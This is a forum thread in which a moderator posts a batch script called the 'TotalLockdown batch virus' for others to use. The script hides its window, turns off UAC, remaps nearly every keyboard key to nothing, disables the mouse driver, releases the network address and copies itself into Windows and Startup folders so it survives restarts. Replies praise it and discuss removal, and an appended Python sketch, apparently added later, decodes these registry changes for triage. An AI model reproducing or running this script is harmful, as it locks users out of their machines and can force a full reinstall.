Batch Beta
The TotalLockdown batch virus


1 The TotalLockdown batch virus on Thu Jan 13, 2011 5:19 am

D4rkus

Moderators
This little batch code here hides the CMD windows, disables the keyboard and the mouse, copies itself to autorun and replaces winstart.bat so you can't get rid of him, then hides the source.
And also messes up the IP.


@echo off
if exist winstart.vbs goto next
echo set objShell = CreateObject("WScript.Shell") >> winstart.vbs
echo objShell.Run "batvirus.bat", vbHide, TRUE >> winstart.vbs
start "" "winstart.vbs"
exit
:next
@Set RegistyEditCmd=Cmd /k Reg Add
@Set HiveSysKey=HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
@%RegistyEditCmd% "%HiveSysKey%" /v "EnableLUA" /t "REG_DWORD" /d "0" /f > nul
echo Windows Registry Editor Version 5.00 > "nokeyboard.reg"
echo [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Keyboard Layout] >> "nokeyboard.reg"
echo "Scancode Map"=hex:00,00,00,00,00,00,00,00,7c,00,00,00,00,00,01,00,00,\ >> "nokeyboard.reg"
echo 00,3b,00,00,00,3c,00,00,00,3d,00,00,00,3e,00,00,00,3f,00,00,00,40,00,00,00,\ >> "nokeyboard.reg"
echo 41,00,00,00,42,00,00,00,43,00,00,00,44,00,00,00,57,00,00,00,58,00,00,00,37,\ >> "nokeyboard.reg"
echo e0,00,00,46,00,00,00,45,00,00,00,35,e0,00,00,37,00,00,00,4a,00,00,00,47,00,\ >> "nokeyboard.reg"
echo 00,00,48,00,00,00,49,00,00,00,4b,00,00,00,4c,00,00,00,4d,00,00,00,4e,00,00,\ >> "nokeyboard.reg"
echo 00,4f,00,00,00,50,00,00,00,51,00,00,00,1c,e0,00,00,53,00,00,00,52,00,00,00,\ >> "nokeyboard.reg"
echo 4d,e0,00,00,50,e0,00,00,4b,e0,00,00,48,e0,00,00,52,e0,00,00,47,e0,00,00,49,\ >> "nokeyboard.reg"
echo e0,00,00,53,e0,00,00,4f,e0,00,00,51,e0,00,00,29,00,00,00,02,00,00,00,03,00,\ >> "nokeyboard.reg"
echo 00,00,04,00,00,00,05,00,00,00,06,00,00,00,07,00,00,00,08,00,00,00,09,00,00,\ >> "nokeyboard.reg"
echo 00,0a,00,00,00,0b,00,00,00,0c,00,00,00,0d,00,00,00,0e,00,00,00,0f,00,00,00,\ >> "nokeyboard.reg"
echo 10,00,00,00,11,00,00,00,12,00,00,00,13,00,00,00,14,00,00,00,15,00,00,00,16,\ >> "nokeyboard.reg"
echo 00,00,00,17,00,00,00,18,00,00,00,19,00,00,00,1a,00,00,00,1b,00,00,00,2b,00,\ >> "nokeyboard.reg"
echo 00,00,3a,00,00,00,1e,00,00,00,1f,00,00,00,20,00,00,00,21,00,00,00,22,00,00,\ >> "nokeyboard.reg"
echo 00,23,00,00,00,24,00,00,00,25,00,00,00,26,00,00,00,27,00,00,00,28,00,00,00,\ >> "nokeyboard.reg"
echo 1c,00,00,00,2a,00,00,00,2c,00,00,00,2d,00,00,00,2e,00,00,00,2f,00,00,00,30,\ >> "nokeyboard.reg"
echo 00,00,00,31,00,00,00,32,00,00,00,33,00,00,00,34,00,00,00,35,00,00,00,36,00,\ >> "nokeyboard.reg"
echo 00,00,1d,00,00,00,5b,e0,00,00,38,00,00,00,39,00,00,00,38,e0,00,00,5c,e0,00,\ >> "nokeyboard.reg"
echo 00,5d,e0,00,00,1d,e0,00,00,5f,e0,00,00,5e,e0,00,00,22,e0,00,00,24,e0,00,00,\ >> "nokeyboard.reg"
echo 10,e0,00,00,19,e0,00,00,30,e0,00,00,2e,e0,00,00,2c,e0,00,00,20,e0,00,00,6a,\ >> "nokeyboard.reg"
echo e0,00,00,69,e0,00,00,68,e0,00,00,67,e0,00,00,42,e0,00,00,6c,e0,00,00,6d,e0,\ >> "nokeyboard.reg"
echo 00,00,66,e0,00,00,6b,e0,00,00,21,e0,00,00,00,00 >> "nokeyboard.reg"
start nokeyboard.reg
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
ipconfig /release
if ERRORLEVEL1 ipconfig /release_all
COPY %0 %windir%WINSTART.BAT
copy "startup.bat" "%userprofile%\Start Menu\Programs\Startup\startup.bat"
attrib +h %0

Use carefully, or you may need to reinstall Windows.



Last edited by D4rkus on Thu Jan 13, 2011 11:36 am; edited 1 time in total

2 Re: The TotalLockdown batch virus on Thu Jan 13, 2011 5:23 am

Defy

Admin
Awesome script there mate!

http://batchb.forumotion.com

3 Re: The TotalLockdown batch virus on Thu Jan 13, 2011 5:24 am

TriGz


Admin
That looks like a pretty dangerous script to be running.
How would you go about removing it?

4 Re: The TotalLockdown batch virus on Thu Jan 13, 2011 5:30 am

D4rkus

Moderators
TriGz wrote: That looks like a pretty dangerous script to be running.
How would you go about removing it?

Reinstall Windows software, I can't see another way. Because you can't use the mouse and the keyboard even if you do a system restart.

5 Re: The TotalLockdown batch virus on Thu Jan 13, 2011 5:38 am

TriGz


Admin
D4rkus wrote: Reinstall Windows software, I can't see another way. Because you can't use the mouse and the keyboard even if you do a system restart.

Could safe mode prevent it though? My guess is yes.
Then from there it is a simple remove from startup process.

6 Re: The TotalLockdown batch virus on Thu Jan 13, 2011 5:42 am

D4rkus

Moderators
TriGz wrote:
D4rkus wrote: Reinstall Windows software, I can't see another way. Because you can't use the mouse and the keyboard even if you do a system restart.

Could safe mode prevent it though? My guess is yes.
Then from there it is a simple remove from startup process.

That's possible, I didn't try that. But it copies to %windir% as WINSTART.BAT, not only to startup.
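
For anyone triaging a machine after a script like the one in post 1, the sketch below (an added example, not part of the original thread) decodes a `Scancode Map` value and flags the three registry changes the script makes: `EnableLUA`, the `Mouclass` `Start` value and the keyboard map. The dictionary keys and the sample bytes are constructed for illustration; the data is assumed to have been read already from a live or offline hive.

```python
import struct

# Constructed sample value (not the one from the thread): drops Esc, Enter and
# left Win, and remaps CapsLock to Ctrl. Layout: version, flags, entry count,
# then 4-byte entries stored as (target, source), ending with a null entry.
SAMPLE_MAP = bytes.fromhex(
    "00000000" "00000000" "05000000"
    "00000100" "00001c00" "00005be0" "1d003a00" "00000000")

def parse_scancode_map(blob: bytes):
    """Decode a REG_BINARY 'Scancode Map' into (source, target) scancode pairs."""
    if len(blob) < 16 or len(blob) % 4:
        raise ValueError("truncated Scancode Map")
    version, flags, count = struct.unpack_from("<III", blob, 0)
    if version or flags:
        raise ValueError("unexpected header")
    if 12 + 4 * count != len(blob):
        raise ValueError("entry count does not match value length")
    entries = [struct.unpack_from("<HH", blob, 12 + 4 * i) for i in range(count)]
    if entries[-1] != (0, 0):
        raise ValueError("missing null terminator")
    return [(src, dst) for dst, src in entries[:-1]]

def triage(values: dict) -> list:
    """Report which of the script's registry changes are present.

    `values` uses hypothetical keys for data already read from a live or
    offline hive: EnableLUA, MouclassStart (DWORDs), ScancodeMap (bytes).
    """
    findings = []
    if values.get("EnableLUA") == 0:
        findings.append("UAC off: Policies\\System EnableLUA=0")
    if values.get("MouclassStart") == 4:
        findings.append("mouse class driver disabled: Mouclass Start=4")
    blob = values.get("ScancodeMap")
    if blob:
        dropped = [f"{src:#06x}" for src, dst in parse_scancode_map(blob) if dst == 0]
        findings.append(f"Scancode Map drops {len(dropped)} keys: {', '.join(dropped)}")
    return findings

if __name__ == "__main__":
    for line in triage({"EnableLUA": 0, "MouclassStart": 4, "ScancodeMap": SAMPLE_MAP}):
        print(line)
```

A source scancode with the `e0` prefix (for example `0xe05b`) is an extended key; an entry whose target is `0x0000` means that key press is discarded.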
